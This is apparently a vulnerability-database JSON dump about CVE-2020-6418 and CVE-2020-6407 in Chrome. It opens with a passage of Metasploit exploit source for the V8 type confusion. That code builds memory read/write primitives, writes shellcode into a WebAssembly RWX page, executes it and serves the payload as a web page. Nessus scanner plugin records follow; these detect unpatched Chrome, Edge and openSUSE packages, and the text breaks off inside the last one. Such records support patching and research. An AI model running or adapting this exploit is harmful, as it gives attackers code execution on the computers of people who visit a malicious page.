corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/48186", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:07:09", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed anymore (bsc#1163588).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-259)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-259.NASL", "href": "https://www.tenable.com/plugins/nessus/134157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-259.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134157);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-259)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163484\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1164828\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:11", "description": "The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "href": "https://www.tenable.com/plugins/nessus/138176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138176);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4f0f972\");\n # https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ec7f076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge (Chromium) 80.0.361.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\n\nconstraints = [{ 'fixed_version' : '80.0.361.62' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:06", "description": "The version of Google Chrome installed is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701270.PASL", "href": "https://www.tenable.com/plugins/nnm/701270", "sourceData": "Binary data 701270.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133953);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:51", "description": "The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133954);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n 